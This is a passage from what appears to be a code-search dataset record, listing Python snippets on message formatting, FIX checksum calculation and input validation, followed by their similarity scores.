self.bad", "def _check_tokens_are_valid(format_string, message):\n named_tokens = re.findall(r\"{(\\w*)}\", format_string)\n invalid_tokens = [x for x in named_tokens if x.lower() not in _valid_tokens]\n if invalid_tokens:\n msg = message\n msg += \" [{0}]. \".format(\", \".join(invalid_tokens))\n msg += 'Did you check your \"modules.yaml\" configuration?'\n raise RuntimeError(msg)", "def format_fix_msg( msg, replace_timestamp=True, replace_length=True ) :\n\n _FULL_FIX_SENDTIME_RE = re.compile('\\x0152=[0-9]{8}-[0-9]{2}:[0-9]{2}:[0-9]{2}(\\\\.[0-9]{3})?\\x01')\n _LENGTH_RE = re.compile('(\\x019=[0-9]*)\\x01')\n\n if replace_timestamp :\n # as a last just-in-case, we'll see if the user already put in a full-FIX-formatted ts\n # if so, leave it alone\n full_sendTime_present = _FULL_FIX_SENDTIME_RE.search(msg)\n if not full_sendTime_present :\n msg = replace_tag_value( msg, 52, time.strftime('%Y%m%d-%H:%M:%S',time.gmtime()) )\n\n # now calculate 9= length\n # hmm. 
length could be zero if both checksum & msg length aren't there\n len = msg.find('\\x0110=') - msg.find('\\x0135=')\n len_tag = _LENGTH_RE.search(msg)\n if len_tag and replace_length :\n msg = msg.replace( len_tag.group(1), '\\x019=' + str(len) )\n # now calculate checksum\n len_end = msg.find('\\x0110=')\n if len_end != -1 :\n checksum = 0\n for i in msg[:len_end+1] :\n checksum += ord(i)\n msg = msg[:len_end+1] + '10=' + \"%03d\" % (checksum % 256) + '\\x01'\n return msg", "def validate_format(self):\n return all(\n [\n self.validate_header_keyword(),\n self.validate_type_keyword(),\n self.validate_type_annotations(),\n self.validate_unique_header(),\n self.validate_against_header_count(),\n ]\n )", "def check_item(self, item: PoItem):\n for line in item.msgstr:\n if len(line) > MAX_LINE_LENGTH - 2: # 2 is for \"\"\n item.add_error(\n self.name,\n f\"Line too long ({len(line) + 2} > \"\n f\"{MAX_LINE_LENGTH}): {line}\",\n )", "def test_cli_format_error_handler_messages():\n resp_val = \"\"\"\n{\n \"apiVersion\": \"v1.0\",\n \"status\": \"Failure\",\n \"metadata\": {},\n \"message\": \"Unauthenticated\",\n \"code\": \"401 Unauthorized\",\n \"details\": {\n \"messageList\": [\n { \"message\":\"Hello1\", \"error\": false },\n { \"message\":\"Hello2\", \"error\": false },\n { \"message\":\"Hello3\", \"error\": true }\n ]\n },\n \"kind\": \"status\",\n \"reason\": \"Credentials are not established\"\n}\n\"\"\"\n resp = MagicMock()\n resp.json = MagicMock(return_value=json.loads(resp_val))\n output = format_utils.cli_format_error_handler(resp)\n assert \"Error: Unauthenticated\" in output\n assert \"Reason: Credentials are not established\" in output\n assert \"- Error: Hello3\" in output\n assert \"- Info: Hello2\" in output", "def test_make_user_message_extra_fields(self):\n msg_helper = MessageHelper()\n msg = msg_helper.make_user_message(\n 'outbound message', 'from', 'to', foo='bar', baz='quux')\n self.assert_message_fields(msg, {'foo': 'bar', 'baz': 'quux'})", "def test_error_type():\n assert error_type('{ \"from\" : \"\", \"to\" : \"\", \"success\" : false, \"error\" : \"\\\nSource currency code is invalid.\" }') == 1\n assert error_type('{ \"from\" : \"\", \"to\" : \"\", \"success\" : false, \"error\" : \"\\\nExchange currency code is invalid.\" }') == 2\n assert error_type('{ \"from\" : \"\", \"to\" : \"\", \"success\" : false, \"error\" : \"\\\nCurrency amount is invalid.\" }') == 3", "def built_error_message(self, key: str, params: List[str]) -> str:\n if key in self.errors:\n error_msg = self.errors[key]\n error_msg = re.sub(\"{..}\", \"\", error_msg)\n return error_msg.format(*params)\n else:\n return \"\"", "def parseable(message_data):\n if not message_data:\n raise TypeError('message_data must not be None')\n\n acceptable = range(97, 123) + range(65, 91) + range(48, 58) + range(33, 43) + range(44, 48) + [58, 63, 64, 94]\n return any(ord(c) not in acceptable for c in message_data['message'].replace(' ', ''))", "def _validate_ms(self, sprintf):\n #self.name2Id(sprintf)\n #re.sub(\"\\'.+?\\'\", 'Thing', fu)\n #self.ont.getSubClasses('fu', 0)\n return", "def test_text_multiline(self):\n self.assertEqual(DiscordReportFormatter().format(self.record(text=\"abc\\ndef\")), \":warning: **abc**\\ndef\")", "def _check_format(file_path, content):\n if not content:\n # testcase file content is empty\n err_msg = u\"Testcase file conetent is empty: {}\".format(file_path)\n logger.log_error(err_msg)\n raise exception.FileFormatError(err_msg)", "def test_compose_email_good(self): \n pass", "def 
display_message():" ]
[ "0.7444605", "0.69293326", "0.690031", "0.67062855", "0.66425115", "0.64710456", "0.64351165", "0.62836003", "0.62724143", "0.61536384", "0.6117061", "0.6076582", "0.6061003", "0.6058752", "0.6057646", "0.60355955", "0.6029556", "0.60024786", "0.599572", "0.59727937", "0.592433", "0.59200674", "0.59193283", "0.58969676", "0.58856845", "0.58790433", "0.58635217", "0.5851296", "0.5823519", "0.58071", "0.58044946", "0.5773297", "0.5768324", "0.5742123", "0.5738138", "0.57342", "0.5720252", "0.57040817", "0.5701406", "0.56932664", "0.56805664", "0.56587946", "0.56201166", "0.5594016", "0.5590385", "0.55796564", "0.55791324", "0.5557957", "0.5555515", "0.55536366", "0.5541155", "0.55286014", "0.55236906", "0.5513566", "0.5507585", "0.550522", "0.5504239", "0.5503216", "0.54916465", "0.5490332", "0.5481491", "0.547885", "0.54702353", "0.5469582", "0.54674023", "0.54650885", "0.5461376", "0.5450593", "0.54503727", "0.5448026", "0.5443046", "0.54424554", "0.5441066", "0.54403776", "0.5439755", "0.54217404", "0.5421134", "0.53977156", "0.5391584", "0.5388483", "0.5379458", "0.53737813", "0.5372896", "0.53685313", "0.53653026", "0.53567153", "0.5344882", "0.5334382", "0.53334975", "0.5320674", "0.5320606", "0.5320022", "0.5315856", "0.53150296", "0.53142387", "0.5310505", "0.53098875", "0.530656", "0.5300928", "0.5297961", "0.52965045" ]
0.0
-1
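
Aside: a hedged, self-contained sketch of the pattern the test in the record above exercises, that is, a helper that logs a warning on failure plus a check that the log message renders without %-formatting errors. All names below are hypothetical stand-ins, not neutron's actual ip_lib API:

import logging
from unittest import mock

LOG = logging.getLogger(__name__)

def set_flag_for_namespace(namespace, value):
    # Hypothetical helper: stands in for a library call that logs a
    # warning when the underlying operation returns a failed status.
    failed = 1  # stand-in for a failed low-level call
    if failed:
        LOG.warning('Failed to set flag to %(value)s in namespace %(ns)s',
                    {'value': value, 'ns': namespace})

def test_setting_failure():
    with mock.patch.object(LOG, 'warning') as mock_warn:
        set_flag_for_namespace('foo', value=1)
    fmt, args = mock_warn.call_args[0]
    # Rendering the captured record proves the %-format string and its
    # argument dict are consistent; a mismatch would raise here.
    assert fmt % args
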
Calculate the reserve factor for skin buckling by computing the critical load and comparing it to the applied load. Return the reserve factor minus 1 so the result can be used as an inequality constraint centered on 0 (f(dim) >= 0 means RF >= 1).
def skinBuckle(dim):
    # kk, bsk, Esk, Est and Nx are module-level material/geometry constants
    bst = dim[0]
    tst = dim[1]
    tsk = dim[2]
    epsilonk = kk * (tsk / bsk)**2                # critical buckling strain
    Et = (Esk * tsk) + (Est * (bst * tst) / bsk)  # smeared stiffness
    Nsk = Et * epsilonk                           # critical load
    rsf = Nsk / Nx                                # reserve factor = critical / applied load
    return rsf - 1  # using a target reserve factor of 1
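
For context, a minimal sketch of how a function with this `rsf - 1` return convention is typically consumed: as an inequality constraint in scipy.optimize.minimize, where the solver enforces fun(dim) >= 0, i.e. a reserve factor of at least 1. The constants, renamed function, and mass proxy below are illustrative assumptions, not values from the source:

from scipy.optimize import minimize

# Illustrative placeholder constants -- assumptions, not source values.
kk, bsk = 4.0, 150.0      # buckling coefficient, skin bay width [mm]
Esk, Est = 70e3, 70e3     # skin / stringer elastic moduli [MPa]
Nx = 300.0                # applied compressive load intensity [N/mm]

def skin_buckle_rf(dim):
    bst, tst, tsk = dim
    epsilonk = kk * (tsk / bsk)**2
    Et = Esk * tsk + Est * (bst * tst) / bsk
    return (Et * epsilonk) / Nx - 1.0  # >= 0 means reserve factor >= 1

def panel_area(dim):
    bst, tst, tsk = dim
    return bsk * tsk + bst * tst  # cross-section area per bay, a mass proxy

res = minimize(panel_area, x0=[30.0, 3.0, 3.0],
               bounds=[(10, 60), (1, 6), (1, 6)],
               constraints=[{'type': 'ineq', 'fun': skin_buckle_rf}])
print(res.x, skin_buckle_rf(res.x))
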
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_load_factor(self):\n # Your code here\n return self.total_items / self.capacity", "def internal_external_canopy_heat_capacity(lumped_cover_heat_capacity: float) -> float:\n return 0.1 * lumped_cover_heat_capacity", "def calculate_effective_capacitance(self, load):\n c_load = load\n # In fF\n c_para = spice[\"min_tx_drain_c\"] * (self.nmos_size / parameter[\"min_tx_size\"])\n transition_prob = 0.1875\n return transition_prob * (c_load + c_para)", "def calculate_lower_boundary(self, divisor):\n\n # see how low you can go\n quotas = [0] * self.states\n fair_shares = [0] * self.states\n counter = 0\n lowest_divisor = 0\n prev_divisor = 0\n estimator = 1000000000\n while counter < 1000:\n for i, population in enumerate(self.populations):\n if divisor is None or population is None:\n return None\n quotas[i] = population / divisor\n fair_shares[i] = math.floor(quotas[i])\n if sum(fair_shares) != self.num_seats:\n estimator = estimator / 10\n prev_divisor = divisor\n divisor = lowest_divisor - estimator\n else:\n lowest_divisor = divisor\n divisor = prev_divisor - estimator\n if lowest_divisor == divisor:\n break\n counter += 1\n return math.ceil(lowest_divisor * 1000) / 1000", "def calc_low_energy_bulb_ratio(lighting_outlets_total, lighting_outlets_low_energy):\n return int(100 * float(lighting_outlets_low_energy) / lighting_outlets_total + 0.5) / 100.0", "def quick_ratio(self):\n return (\n self.current_assets - self.inventory_net) / self.current_liabilities", "def get_additional_ball_capacity(self):\n return 999", "def ComputeRegenerativeBraking(self):\r\n pass", "def get_additional_ball_capacity(cls):\n return 999", "def get_amount_in(amount_out, reserve_in, reserve_out):\n assert amount_out > 0\n assert reserve_in > 0 and reserve_out > 0\n numerator = reserve_in*amount_out*1000\n denominator = (reserve_out - amount_out)*997\n return float(numerator/denominator + 1)", "def _load_factor(self):\n return self.size / len(self.buckets)", "def standard_init_price(self):\n # If a system can't use something, its price is zero.\n _good = self.tradeitem\n if self.planet.tech_level < _good.tu and _good.name not in 'fuel':\n base_price = 0\n else:\n base_price = _good.plt + (self.planet.tech_level * _good.pi)\n # if good is highly requested, increase the price\n if self.planet.status in [_good.dps]:\n base_price = base_price + (base_price * 0.5)\n # large system: high production decreases prices\n base_price = (base_price * (100 - self.planet.system_size)) / 100\n\n # price can't be negative\n if base_price < 0:\n base_price = 0\n\n return int(base_price)", "def spendFuelToSurvive(self):\n fuelNeeded = self.getLightUpkeep()\n woodNeeded = math.ceil(\n fuelNeeded / self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"WOOD\"]\n )\n woodUsed = min(self.cargo[\"wood\"], woodNeeded)\n fuelNeeded -= woodUsed * self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"WOOD\"]\n self.cargo[\"wood\"] -= woodUsed\n if fuelNeeded <= 0:\n return True\n\n coalNeeded = math.ceil(\n fuelNeeded / self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"COAL\"]\n )\n coalUsed = min(self.cargo[\"coal\"], coalNeeded)\n fuelNeeded -= coalUsed * self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"COAL\"]\n self.cargo[\"coal\"] -= coalUsed\n\n if fuelNeeded <= 0:\n return True\n\n uraniumNeeded = math.ceil(\n fuelNeeded / self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"URANIUM\"]\n )\n uraniumUsed = min(self.cargo[\"uranium\"], uraniumNeeded)\n fuelNeeded -= uraniumUsed * 
self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"URANIUM\"]\n self.cargo[\"uranium\"] -= uraniumUsed\n\n if fuelNeeded <= 0:\n return True\n\n return fuelNeeded <= 0", "def base_reserve_0():\n print('Setting base reserve to 0')\n upgrade('basereserve', 'base_reserve_in_stroops', 0)", "def calcweight( self ):\n weight = 0\n zeroval = 0\n for sensor in ('right_top', 'right_bottom', 'left_top', 'left_bottom'):\n\t\treading = self.readings[sensor]\n\t\tcalibration = self.named_calibration[sensor]\n if sensor == 'right_top':\n zeroval = self.rtzv\n elif sensor == 'right_bottom':\n zeroval = self.rbzv\n elif sensor == 'left_top':\n zeroval = self.ltzv\n else:\n zeroval = self.lbzv\n\t\tif reading > calibration[2]:\n\t\t\tprint \"Warning, %s reading above upper calibration value\" % sensor\n\t\tif reading < calibration[1]:\n\t\t\tweight += 1700 * (reading + zeroval - calibration[0]) / (calibration[1] - calibration[0])\n\t\telse:\n\t\t\tweight += 1700 * (reading + zeroval - calibration[1]) / (calibration[2] - calibration[1]) + 1700\n\n if self.debug == 1:\n print \"weight calculated pre-conversion\", weight\n print \"return val\", self.converttolbs( weight / 100.0 )\n\n # return self.converttolbs( weight / 100.0 )\n return weight / 100.0", "def initial_cash_balance(self) -> float:\n return self.buy_budget * len(self.stocks)", "def penalty(self):\n return 0", "def load_factor(self) -> float:\n return self.filled_count / self.table_size", "def lower_bound(stock):\n counter=0\n for i in stock_price(stock):\n if i <= support(stock):\n counter+=1\n return counter", "def weight(self):\n counters = [\n (\"total_mhz\", self.dominfo.vms_online + self.dominfo.cpus_online / 4.0),\n (\"memory\", self.dominfo.vms_online + self.dominfo.ram_online / 4096.0),\n ]\n load_w = sum((self.node[k] / float(v or 1)) / self.node[k] for k, v in counters)\n return load_w * self.srv_weight", "def volneeded(self, totalvol: float) -> float:\n return totalvol*self.final*1.0/self.stock", "def get_load_factor(self):\r\n return self.num_items / self.table_size", "def penalty_calc(self):\n self.p_budget = (self.tx_oma_min - self.rx_unstressed_sensitivity - self.fiber_conn_loss)*self.l_1\n\n # fiber attenuation,\n self.p_atten = self.alpha*self.length # column B\n\n # calculate bandwidth for RIN test (exclude transmitter)\n rin_inverse_bw = np.sqrt(np.square(1.0/self.bw_cd) + np.square(1.0/self.bw_md) + (0.477/(self.rx_bw**2))*self.l_1)\n rin_bw = 1.0 / rin_inverse_bw\n\n # see FC-MSQS-2 equation B.47 in Annex B.4 for the following k_rin = math.sqrt(2.0/math.pi)*erfinv(0.8)\n k_rin = 0.7\n\n # v_rin,\n self.v_rin = (k_rin*1E6*(self.rin_test_isi**2)*rin_bw*\n math.pow(10.0,0.1*self.rin)) # column AK\n\n # Prin,\n print('v_rin: ', self.v_rin)\n print('Q: ',self.Q)\n print('isi_dj_refl_closed :', self.isi_dj_refl_closed)\n self.p_rin = -10.0*np.log10(np.sqrt(1.0-np.multiply(self.v_rin, np.square(self.Q/self.isi_dj_refl_closed)))) # column R\n print(\"P_rin : \", self.p_rin)\n self.beta = (3.14159E-6*self.speedup*self.br_nominal *self.delta_lambda*self.d1*self.length) # column O\n self.sigma_mpn = (self.k_mpn/math.sqrt(2.0)*(self.l_1 -np.exp(-np.square(self.beta)))) # column P\n self.p_mpn = (-10.0*np.log10(np.sqrt(self.l_1 - (self.Q**2)*np.square(self.sigma_mpn)))) # column Q\n self.p_blw = (-10.0*math.log10(math.sqrt(1.0- ((self.Q*self.sigma_blw)/ self.isi_tp4_rx)**2))*self.l_1) # cell T13\n self.p_reflection = -10.0*np.log10(self.isi_reflection) # column N\n self.v_mn = (((1.0-math.pow(10.0,-0.2*self.pmn))/ 
(self.Q)**2)*self.l_1) # cell AG7\n print(\"isi_center : \", self.isi_center)\n\n self.p_isi_center = -10.0*np.log10(self.isi_center) # column J\n\n self.p_isi_corners = (-10.0*np.log10(self.isi_corners) - self.p_isi_center) # column K\n self.p_isi_dj_center = (-10.0*np.log10(self.isi_dj_refl_closed) - self.p_isi_center) # column L\n self.p_isi_dj_corners = (-10.0*np.log10(self.isi_dj_corners) -self.p_isi_center -self.p_isi_corners) # column M\n\n\n # calculate the \"cross\" penalty contribution, column S\n arg1 = ((self.sigma_blw**2 + self.v_rin)/ np.square(self.isi_dj_refl_closed))\n arg2 = self.l_1 - (self.Q**2)*(arg1 + self.v_mn + np.square(self.sigma_mpn))\n arg3 = (-10.0*np.log10(np.multiply(self.isi_dj_refl_closed, np.sqrt(arg2))))\n self.p_cross_center = ( # column S\n arg3\n - self.p_blw # cell T13\n - self.p_isi_center # column J\n - self.p_isi_dj_center # column L\n - self.p_mpn # column Q\n - self.p_reflection # column N\n - self.p_rin # column R\n - self.pmn*self.l_1) # cell G13\n print('p_isi_center: ', self.p_isi_center)\n\n # calculate the total power budget evaluated at the center of the eye\n self.p_total_center = ( # column T\n self.p_isi_center # column J\n + self.p_isi_dj_center # column L\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1) # cell G13\n # calculate the total power budget evaluated at the corner of the eye\n self.p_total_corners = (\n self.p_isi_center # column J\n + self.p_isi_corners # column K\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1 # cell G13\n + self.p_isi_dj_corners)# column M\n\n # receiver stressed sensitivity\n self.margin = ( self.p_budget\n - self.p_total_center) # column W\n\n self.rx_stressed_sensitivity = (\n self.tx_oma_min*self.l_1\n - self.chil\n - self.p_mpn\n - self.p_reflection\n - self.p_rin\n - 0.5*self.p_cross_center\n - self.pmn*self.l_1\n - self.margin[self.lnum//2]*self.l_1)\n\n\n # end of GbE10.penalty_calc\n #======================================================================+", "def ram_condition(min_gb=3):\n return get_free_gb() < min_gb", "def premium(self):\n premium = 0\n for weight, mean, std in zip(self.weights, self.means, self.stds):\n shift = (self.data['riskfree'] - mean) * self.data['maturity']\n moneyness = np.array(self.data['moneyness']) + shift\n premium += weight * blackscholes_norm(moneyness,\n self.data['maturity'],\n std, self.data['call'])\n return premium", "def getRepairCapacity(self):\n return int(self.myDesign.getSYCRequired() * (1-(self.strength/100.0)))", "def trucks_required(self) -> int:\n daily_demand = (\n self.total_demand() / self.operations.productivity.working_days_per_year\n )\n trucks_required = np.ceil(\n daily_demand\n / (self.operations.avg_vol_per_lift() * self.inputs.lifts_per_truck_day)\n )\n return trucks_required", "def qty_available(quant) -> float:\n return quant.quantity - quant.reserved_quantity", "def infect(self, viral_load):\n if self.health <= 29:\n self.health = self.health - (0.1 * viral_load)\n elif self.health > 29 and self.health < 50:\n self.health = self.health - (1.0 * viral_load)\n elif self.health > 50:\n self.health = self.health - (2.0 * viral_load)", "def calculate_br_up_metric(br_up):\n if br_up < 1:\n br_up = 1\n min_baud = 1200\n max_baud = 38400\n\n num = np.log(br_up) - np.log(min_baud)\n den = 
np.log(max_baud) - np.log(min_baud)\n\n return (num / den + 0.1).clip(min=0, max=1)", "def prescaler(self) -> int:", "def regenShields(self, kW, kWtoSPfactor):\n remainder = kW \n if self.currentSP < self.maxSP:\n # how many kW required to fully charge?\n # desiredSP = kWneeded * fact\n # kWneeded = desiredSP/fact\n desiredSP = self.maxSP - self.currentSP\n kWneeded = desiredSP / kWtoSPfactor\n if kW > kWneeded:\n remainder = kW - kWneeded\n #print \"more kW than need for sheilds; remainder\",remainder\n else:\n remainder = 0\n \n self.currentSP += (kW * kWtoSPfactor)\n if self.currentSP > self.maxSP:\n self.currentSP = self.maxSP\n self.myParent.updateMyGUIValue(self.position+'Shields', self.currentSP)\n return remainder", "def canopy_heat_capacity(states: ClimateStates) -> float:\n return CAP_LEAF * states.leaf_area_index", "def balanceFactor(self):\n leftHeight = self.left.height if self.left != None else 0\n rightHeight = self.right.height if self.right != None else 0\n return rightHeight - leftHeight", "def __call__(self, auctioneer):\n curr_bid = auctioneer.current_bid\n bid_price = curr_bid * self._bid_increase_perc\n if bid_price <= self._budget and self.get_bid_probability() > 0.3:\n self._highest_bid = bid_price\n return bid_price\n return 0", "def cakes(recipe, available):\n return min({k: available[k]//recipe[k] if k in available else 0 for k in recipe}.values())", "def calculate_supply(self):\r\n \r\n for cell in self.cells:\r\n cell.supply = min(self.max_volume,\r\n self.wave_speed / self.free_speed *\r\n (self.cell_length * self.jam_density -\r\n cell.volume)) /self.interval\r\n self.supply = self.cells[0].supply", "def calc_generation_wind_proposed (self):\n if self.comp_specs['proposed capacity'] != UNKNOWN:\n self.load_offset_proposed = \\\n self.comp_specs['proposed capacity']\n self.generation_wind_proposed = \\\n self.comp_specs['proposed generation']\n\n if self.generation_wind_proposed == UNKNOWN:\n self.generation_wind_proposed = self.load_offset_proposed *\\\n float(self.comp_specs\\\n ['capacity factor'])*\\\n constants.hours_per_year\n\n return\n\n self.load_offset_proposed = 0\n\n offset = self.average_load*\\\n (self.comp_specs['percent generation to offset'] / 100.0)\n #~ print self.forecast.generation['generation hydro'].sum()\n\n # removed on purpose\n #~ hydro = \\\n #~ self.forecast.generation['generation hydro'].fillna(0).sum()\n #~ if hydro > 0:\n #~ offset *= 2\n\n # existing very variable RE\n existing_RE = \\\n int(float(self.cd['wind capacity'])) + \\\n int(float(self.cd['solar capacity']))\n\n if existing_RE < (round(offset/25) * 25): # ???\n #~ print \"True\"\n self.load_offset_proposed = round(offset/25) * 25 - existing_RE\n\n\n\n # not needed for now\n #~ self.total_wind_generation = self.generation_load_proposed + \\\n #~ int(self.comp_specs['wind capacity'])\n\n self.generation_wind_proposed = self.load_offset_proposed * \\\n float(self.comp_specs['capacity factor'])*\\\n constants.hours_per_year\n #~ print 'self.load_offset_proposed',self.load_offset_proposed\n #~ print 'self.generation_wind_proposed',self.generation_wind_proposed", "def useWater(self, used):\n self.amount = max(0, self.amount - used)", "def calculate_upper_boundary(self, divisor):\n\n # see how high you can go\n quotas = [0] * self.states\n fair_shares = [0] * self.states\n counter = 0\n highest_divisor = 0\n prev_divisor = 0\n estimator = 1000000000\n while counter < 1000:\n for i, population in enumerate(self.populations):\n if divisor is None:\n return None\n quotas[i] = 
population / divisor\n fair_shares[i] = math.floor(quotas[i])\n if sum(fair_shares) != self.num_seats:\n estimator = estimator / 10\n prev_divisor = divisor\n divisor = highest_divisor + estimator\n else:\n highest_divisor = divisor\n divisor = prev_divisor + estimator\n if highest_divisor == divisor:\n break\n counter += 1\n return math.floor(highest_divisor * 1000) / 1000", "def get_remaining_fuel(self):\n return min(self.liquid_fuel, self.oxidizer)", "def _cost_caught_by_police(self):\n if self.fine_frequency != 0:\n if self.number_of_courses % self.fine_frequency == 0 and self.number_of_courses != 0:\n if self.number_of_courses % self.fine_frequency_paid_by_driver == 0 and self.number_of_courses != 0:\n self.fine_paid_number_of_courses += 1\n fine_value = np.random.choice([100, 200, 500], p=[0.25, 0.4, 0.35])\n self.total_penalty_points += self._add_penalty_points() # adding penalty points\n return fine_value\n else:\n return 0\n else:\n return 0\n else:\n return 0", "def get_risk_per_unit(price, sl_price):\n return abs(price - sl_price)", "def calculate_init_stock(self, good=None):\n # random quantity * systemsize * techlevel (hence, it can be zero)\n size = self.planet.system_size\n level = self.planet.tech_level\n stock = random.randrange(0, 25) * (size + 1) * level\n\n # SPECIALRESOURCES add 50% production\n if self.planet.special in [self.tradeitem.cr]:\n stock = stock + (stock * 0.5)\n\n # TODO enhancement: difficulty levels should affect fuel stocks\n if good in ['fuel']:\n stock = stock * 10\n\n return int(stock)", "def get_min_takeover(cell: Cell) -> int:\n if cell.creature == 'humans':\n return math.ceil(cell.number * parameters.HUMANS_TAKEOVER_FACTOR)\n return math.ceil(cell.number * parameters.OPPONENT_TAKEOVER_FACTOR)", "def rebalance_weightings(context):\r\n total_ratio = 0\r\n log.info(\"*******Rebalancing weightings********\")\r\n print(context.up_ratios)\r\n \r\n for asset, ratio in context.up_ratios.items():\r\n total_ratio += ratio\r\n \r\n for asset, ratio in context.up_ratios.items():\r\n context.max_weights[asset] = ratio/total_ratio\r\n \r\n log.info(context.max_weights)", "def upper_bound(stock):\n counter=0\n for i in stock_price(stock):\n if i >= resistance(stock):\n counter+=1\n return counter", "def fuel_required(mass):\n return max(math.floor(mass/3) - 2, 0)", "def MINIMUM_BET() -> int:\n return 10", "def initial_balance(self) -> Quantity:\n return self._initial_balance", "def overhead(readings):\n return 100.0 * (int(readings[0]) + int(readings[1])) / (int(readings[2]) + int(readings[3]))", "def unfair_coins(num_coins, num_unfair, percent_unfair, heads_needed):\n\tpart_fair = (num_coins - num_unfair) / num_coins\n\tpart_unfair = num_unfair / num_coins\n\tprob_fair = 0.5**heads_needed\n\tprob_unfair = (percent_unfair / 100)**heads_needed\n\treturn part_fair * prob_fair + part_unfair * prob_unfair", "def calc_pre_intertie_generation (self):\n\n self.pre_intertie_generation = \\\n self.forecast.get_generation(self.start_year,self.end_year)\n\n gen_eff = self.cd[\"diesel generation efficiency\"]\n self.pre_intertie_generation_fuel_used = \\\n self.pre_intertie_generation / gen_eff\n\n #~ print 'self.baseline_generatio',self.baseline_generation", "def weight_multiplier(self):\n return CONF.PF9.vcpu_weight_multiplier", "def fuel_required(mass):\n return int(floor(mass / 3) - 2)", "def calc_boiler_const(Q_load_Wh, thermal_efficiency):\n Q_fuel_Wh = Q_load_Wh / thermal_efficiency\n Q_losses_Wh = Q_fuel_Wh - Q_load_Wh\n\n return Q_fuel_Wh, Q_losses_Wh", "def 
stealability(self):\n stealability_score = float(self.price) / float(self.weight)\n print (stealability_score)\n\n if stealability_score < 0.5:\n return 'Not so stealable...'\n elif stealability_score >= 0.5 and stealability_score < 1.0:\n return 'Kinda stealable.'\n else:\n return 'Very stealable!'", "def dilutionneeded(self) -> float:\n return self.stock*1.0/self.final", "def get_allowable_fraction_without(mem_to_reserve, cuda_device_index):\n current_free = get_free_gpu_memory(cuda_device_index)\n allowable = current_free - mem_to_reserve # 1GB\n allowable_fraction = allowable / current_free\n if allowable_fraction <= 0.0:\n raise ValueError(f\"Can't leave 1GB over for the inference kernel, because\"\n f\" there is only {allowable} total free GPU memory.\")\n return allowable_fraction", "def calculate_overbook_num(self):\n\n overbook_level_decimal = self.overbook_level / float(100.0)\n return self.num_rooms + math.ceil(overbook_level_decimal * self.num_rooms)", "def budget_used(self):\n return int(self.total_spent() / self.budget() * 100.0)", "def getBalanceFactor(self):\n \n return (self._leftSubtreeHeight - self._rightSubtreeHeight)", "def _check_capacity_limit(self, res, amt, balance, meta, raven_vars, dispatch, t, level):\n # note \"amt\" has units of AMOUNT not RATE (resource, not resource per second)\n sign = np.sign(amt)\n # are we storing or providing?\n #print('DEBUGG supposed current level:', level)\n if sign < 0:\n # we are being asked to consume some\n cap, meta = self.get_capacity(meta, raven_vars, dispatch, t)\n available_amount = cap[res] - level\n #print('Supposed Capacity, Only calculated ins sign<0 (being asked to consumer)',cap)\n else:\n # we are being asked to produce some\n available_amount = level\n # the amount we can consume is the minimum of the requested or what's available\n delta = sign * min(available_amount, abs(amt))\n return {res: delta}, meta", "def revenue_landfill(self) -> float:\n return self.income_statement.revenue.operating_revenue * (\n 1 - self.inputs.allocation_to_collection_unit\n )", "def overall_reduction(self):\n return 84", "def min_brightness(self):\n return .0", "def constrain(amt,low,high):\n if amt < low:\n return low\n elif amt > high:\n return high\n else:\n return amt", "def _compute_quantization_factor(self):\n self._quantization_factor = (float(self._full_value_range) /\n self._number_of_intervals)\n logging.debug(\n 'full value range: %r, number of intervals: %r',\n self._full_value_range, self._number_of_intervals)\n logging.debug('quantization factor: %r', self._quantization_factor)", "def test_loc_techs_resource_capacity_constraint(self, override):\n\n if override is None:\n m = build_model(\n {}, \"simple_supply_and_supply_plus,two_hours,investment_costs\"\n )\n m.run(build_only=True)\n expr = m._backend_model.resource_cap[(\"b\", \"test_supply_plus\")]\n assert expr.lb == 0\n assert expr.ub == np.inf\n\n else:\n m = build_model(\n {\n \"techs.test_supply_plus.constraints.resource_cap_{}\".format(\n override\n ): 10\n },\n \"simple_supply_and_supply_plus,two_hours,investment_costs\",\n )\n m.run(build_only=True)\n expr = m._backend_model.resource_cap[(\"b\", \"test_supply_plus\")]\n if override == \"max\":\n assert expr.ub == 10\n assert expr.lb == 0\n elif override == \"equals\":\n assert expr.ub == 10\n assert expr.lb == 10\n if override == \"min\":\n assert expr.lb == 10\n assert expr.ub == np.inf", "def critical_thickness(self):\n horizontal_tail_thickness = sorted(self.stabilizer_h.solid.faces, key=lambda f: 
f.cog.y)[-1].bbox.height\n vertical_tail_thickness = sorted(self.stabilizer_vright.solid.faces, key=lambda f: f.cog.z)[0].bbox.length\n if horizontal_tail_thickness >= vertical_tail_thickness:\n critical_thickness = horizontal_tail_thickness\n else:\n critical_thickness = vertical_tail_thickness\n return critical_thickness", "def get_load_factor(self):\n # Your code here\n return self.count/len(self.data)", "def bike_multiplier(bikelane, bicycle_pref):\n result = bicycle_pref * 0.8\n if bikelane=='Yes':\n return -result\n return 0.0", "def branching_factor(data, loc):\n\n return 20", "def lot_leverage(self): \n return 20", "def recommend_contract(meter_load, percentile=100.0):\n\n load_value = np.nanpercentile(meter_load[meter_load != 0], percentile)\n\n for contract in contracts_available:\n if load_value < contract:\n return contract/kW\n\n return contracts_available[-1]/kW", "def scale_blackhurst_results_to_usgs_values(\n df_load, attr, download_FBA_if_missing):\n # determine national level published withdrawal data for usgs mining\n # in FBS method year\n pv_load = load_fba_w_standardized_units(\n datasource=\"USGS_NWIS_WU\", year=str(attr['helper_source_year']),\n flowclass='Water', download_FBA_if_missing=download_FBA_if_missing)\n\n pv_sub = pv_load[(pv_load['ActivityConsumedBy'] == 'Mining') &\n (pv_load['Compartment'] == 'total') &\n (pv_load['FlowName'] == 'total')].reset_index(drop=True)\n # rename the published value flow name and merge with Blackhurst data\n pv_sub = pv_sub.rename(columns={'FlowAmount': 'pv'})\n df = df_load.merge(pv_sub[['Location', 'pv']], how='left')\n # calculate the difference between published value and allocated value\n # for each naics length\n df = 